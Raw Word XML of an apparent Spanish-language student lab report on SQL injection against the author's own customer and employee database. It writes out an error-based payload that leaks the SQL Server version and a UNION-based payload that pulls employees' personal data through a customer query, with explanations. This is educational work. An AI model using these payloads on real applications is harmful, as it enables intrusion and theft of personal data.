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DFE0A" w14:textId="253ADC6C" w:rsidR="006647FE" w:rsidRPr="008029F7" w:rsidRDefault="008029F7" w:rsidP="008029F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008029F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a. Realice una inyección SQL basado en errores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23487037" w14:textId="159E9521" w:rsidR="006647FE" w:rsidRPr="002D27C9" w:rsidRDefault="006647FE" w:rsidP="008029F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Consulta original:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D171AB" w14:textId="674FC450" w:rsidR="006647FE" w:rsidRPr="008029F7" w:rsidRDefault="006647FE" w:rsidP="008029F7">
      <w:r w:rsidRPr="008029F7">
        <w:t xml:space="preserve">SELECT * FROM Cliente WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008029F7">
        <w:t>correo_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008029F7">
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="008029F7">
        <w:t>correo_</w:t>
      </w:r>
      <w:r w:rsidR="00005CC2">
        <w:t>de_</w:t>
      </w:r>
      <w:r w:rsidR="002D27C9" w:rsidRPr="008029F7">
        <w:t>cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008029F7">
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DCB7D7" w14:textId="0C6FB5F4" w:rsidR="006647FE" w:rsidRPr="008029F7" w:rsidRDefault="006647FE" w:rsidP="008029F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008029F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entrada maliciosa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DDB0A2" w14:textId="45D0BBF4" w:rsidR="006647FE" w:rsidRDefault="006647FE" w:rsidP="008029F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006647FE">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>''''' AND 1=CONVERT(int, (SELECT @@VERSION))--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4658D5" w14:textId="3CF05722" w:rsidR="006647FE" w:rsidRPr="002D27C9" w:rsidRDefault="006647FE" w:rsidP="008029F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Consulta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>afectada</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5A501B" w14:textId="396C1C5C" w:rsidR="00CC77F1" w:rsidRDefault="00CC77F1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>correo_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC77F1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '' AND 1=CONVERT(int, (SELECT @@VERSION))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F09BD59" w14:textId="05579BE9" w:rsidR="008029F7" w:rsidRPr="00CC77F1" w:rsidRDefault="008029F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D04EC73" wp14:editId="543C7511">
            <wp:extent cx="5612130" cy="3453765"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="13335"/>
            <wp:docPr id="18560819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819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37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EDDD9D" w14:textId="1DAB8590" w:rsidR="006647FE" w:rsidRPr="008029F7" w:rsidRDefault="008029F7">
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="006647FE" w:rsidRPr="006647FE">
        <w:t xml:space="preserve">l campo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006647FE" w:rsidRPr="006647FE">
        <w:t>correo_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006647FE" w:rsidRPr="006647FE">
        <w:t xml:space="preserve"> se compara con 'una cadena vacía, luego viene AND 1=CONVERT(...), y termina con -- (comentario), por lo </w:t>
      </w:r>
      <w:r w:rsidR="006647FE" w:rsidRPr="008029F7">
        <w:t>que el resto se ignora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466050E5" w14:textId="147D3CA9" w:rsidR="00377507" w:rsidRDefault="008029F7">
      <w:r>
        <w:t>Esta inyección nos devuelve información como la versión del SMBD, la edición de la misa, y el sistema operativo de la maquina donde se está instalado el manejador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EB0BF4" w14:textId="77777777" w:rsidR="00377507" w:rsidRDefault="00377507"/>
    <w:p w14:paraId="31D1D708" w14:textId="77777777" w:rsidR="008029F7" w:rsidRDefault="008029F7"/>
    <w:p w14:paraId="75833356" w14:textId="77777777" w:rsidR="008029F7" w:rsidRDefault="008029F7"/>
    <w:p w14:paraId="74FED5E8" w14:textId="77777777" w:rsidR="008029F7" w:rsidRDefault="008029F7"/>
    <w:p w14:paraId="7919638F" w14:textId="77777777" w:rsidR="008029F7" w:rsidRDefault="008029F7"/>
    <w:p w14:paraId="32329006" w14:textId="36D958FC" w:rsidR="00377507" w:rsidRPr="00817732" w:rsidRDefault="00F5488C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidR="00005CC2" w:rsidRPr="00817732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Realice una inyección SQL basado en uniones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9A12A" w14:textId="4B220CE3" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consulta original:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036B825E" w14:textId="331471FE" w:rsidR="002D27C9" w:rsidRPr="001E64CA" w:rsidRDefault="002D27C9">
      <w:r w:rsidRPr="001E64CA">
        <w:t xml:space="preserve">SELECT * FROM Cliente WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E64CA">
        <w:t>correo_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E64CA">
        <w:t xml:space="preserve"> = ' + @correo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F482F1" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entrada maliciosa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727B43A9" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">''''' UNION SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDF9C0F" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">    CAST(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>id_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve"> AS VARCHAR),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0672DA6C" w14:textId="73763F75" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="00CC77F1" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>nombre_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F321528" w14:textId="023B0272" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="00CC77F1" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>apePat_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F629B03" w14:textId="5227E782" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="00CC77F1" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>apeMat_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1A91E" w14:textId="766A2250" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="00CC77F1" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>correo_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2021B460" w14:textId="5F3F4DED" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="00CC77F1" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>telefono_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48117D7F" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">    CAST(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>fechaNac_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve"> AS VARCHAR), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62085AEF" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>genero_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75956EF1" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>calle_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CE17E1" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>numero_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D76BDD2" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>colonia_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D0C23" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>ciudad_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA780D8" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>estado_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1806A80D" w14:textId="7BF532DC" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="00CC77F1" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D27C9" w:rsidRPr="002D27C9">
        <w:t>cp_empleado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="173D7FF5" w14:textId="5269BC6F" w:rsidR="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:t>FROM Empleado--''';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F58B86" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799A687C" w14:textId="729D4A6F" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consulta afectada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70192BC2" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="002D27C9" w:rsidRDefault="002D27C9" w:rsidP="002D27C9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>correo_cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48967B30" w14:textId="77777777" w:rsidR="006A000C" w:rsidRDefault="002D27C9" w:rsidP="006A000C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidR="006A000C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4589F7E4" w14:textId="77777777" w:rsidR="006A000C" w:rsidRDefault="002D27C9" w:rsidP="006A000C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D27C9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDBFA50" w14:textId="4AB0AD35" w:rsidR="002D27C9" w:rsidRPr="006A000C" w:rsidRDefault="002D27C9" w:rsidP="006A000C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006A000C">
        <w:t>FROM Empleado</w:t>
      </w:r>
      <w:r w:rsidR="006A000C" w:rsidRPr="006A000C">
        <w:t>--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41640754" w14:textId="77777777" w:rsidR="002D27C9" w:rsidRPr="006A000C" w:rsidRDefault="002D27C9" w:rsidP="002D27C9"/>
    <w:p w14:paraId="62894A9F" w14:textId="77777777" w:rsidR="00817732" w:rsidRPr="006A000C" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="59BCCB2B" w14:textId="77777777" w:rsidR="00817732" w:rsidRPr="006A000C" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="194EEEB3" w14:textId="77777777" w:rsidR="00817732" w:rsidRPr="006A000C" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="0D8D2CD9" w14:textId="77777777" w:rsidR="00817732" w:rsidRPr="006A000C" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="63AABB0A" w14:textId="77777777" w:rsidR="00817732" w:rsidRPr="006A000C" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="6610F450" w14:textId="77777777" w:rsidR="00817732" w:rsidRPr="006A000C" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="58556B9A" w14:textId="77777777" w:rsidR="00817732" w:rsidRPr="006A000C" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="10A35C96" w14:textId="77777777" w:rsidR="00817732" w:rsidRPr="006A000C" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="7EFECEF4" w14:textId="77777777" w:rsidR="00817732" w:rsidRPr="006A000C" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="0D072FF4" w14:textId="66239B04" w:rsidR="00377507" w:rsidRPr="006A000C" w:rsidRDefault="00817732">
      <w:r w:rsidRPr="006A000C">
        <w:t xml:space="preserve">Tabla </w:t>
      </w:r>
      <w:r w:rsidR="00377507" w:rsidRPr="006A000C">
        <w:t>Empleado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F513932" w14:textId="765ADC2D" w:rsidR="00377507" w:rsidRDefault="00377507">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16BDAF6C" wp14:editId="59AA4C0F">
            <wp:extent cx="5612130" cy="3155315"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="156933033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30337" name="Imagen 1" descr="Una captura de pantalla de una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5279" w14:textId="77777777" w:rsidR="00377507" w:rsidRDefault="00377507"/>
    <w:p w14:paraId="50E0C31F" w14:textId="0CDBA30C" w:rsidR="00377507" w:rsidRDefault="00817732">
      <w:r>
        <w:t xml:space="preserve">Tabla </w:t>
      </w:r>
      <w:r w:rsidR="00377507">
        <w:t>Cliente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDA5F9A" w14:textId="2789C17B" w:rsidR="00377507" w:rsidRDefault="00377507">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD04992" wp14:editId="705B4535">
            <wp:extent cx="5612130" cy="3155315"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="669359703" name="Imagen 1" descr="Interfaz de usuario gráfica, Aplicación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59703" name="Imagen 1" descr="Interfaz de usuario gráfica, Aplicación, Excel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7873" w14:textId="77777777" w:rsidR="00377507" w:rsidRDefault="00377507"/>
    <w:p w14:paraId="30D9402A" w14:textId="77777777" w:rsidR="00377507" w:rsidRDefault="00377507"/>
    <w:p w14:paraId="433FF0D4" w14:textId="77777777" w:rsidR="00377507" w:rsidRDefault="00377507"/>
    <w:p w14:paraId="3BA524B6" w14:textId="55D87A9D" w:rsidR="00817732" w:rsidRDefault="00817732">
      <w:r>
        <w:t>Resultado de la consulta afectada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B09173" w14:textId="77777777" w:rsidR="00817732" w:rsidRDefault="00377507">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64920700" wp14:editId="5CA2380A">
            <wp:extent cx="5612130" cy="3155315"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="2848550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55047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B348" w14:textId="610AAD8B" w:rsidR="00377507" w:rsidRDefault="00817732">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00377507">
        <w:t>quí me est</w:t>
      </w:r>
      <w:r>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidR="00377507">
        <w:t xml:space="preserve"> mostrando los </w:t>
      </w:r>
      <w:r>
        <w:t>registros</w:t>
      </w:r>
      <w:r w:rsidR="00377507">
        <w:t xml:space="preserve"> de Empleado, cuando en la consulta SELECT le pedí los de Cliente</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F24C6" w14:textId="554A1729" w:rsidR="00377507" w:rsidRDefault="00EA0B52">
      <w:r>
        <w:t>Por lo que la inyección UNION se está realizando correctamente,</w:t>
      </w:r>
      <w:r w:rsidR="00817732">
        <w:t xml:space="preserve"> mes muestra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> los encabezamos de la columna de </w:t>
      </w:r>
      <w:r w:rsidR="006A000C">
        <w:t>Cliente,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00817732">
        <w:t>pero me regresa los reg</w:t>
      </w:r>
      <w:r>
        <w:t>istros de la tabla de Empleado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E9973D" w14:textId="77777777" w:rsidR="00F5488C" w:rsidRDefault="00F5488C"/>
    <w:p w14:paraId="7088F9AA" w14:textId="77777777" w:rsidR="00F5488C" w:rsidRDefault="00F5488C"/>
    <w:p w14:paraId="1F8EEBF1" w14:textId="77777777" w:rsidR="00817732" w:rsidRDefault="00817732"/>
    <w:p w14:paraId="5D59ADA0" w14:textId="77777777" w:rsidR="00817732" w:rsidRDefault="00817732">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3D7F3C" w14:textId="378B72BC" w:rsidR="00F5488C" w:rsidRPr="00817732" w:rsidRDefault="00F5488C">
      <w:pPr>
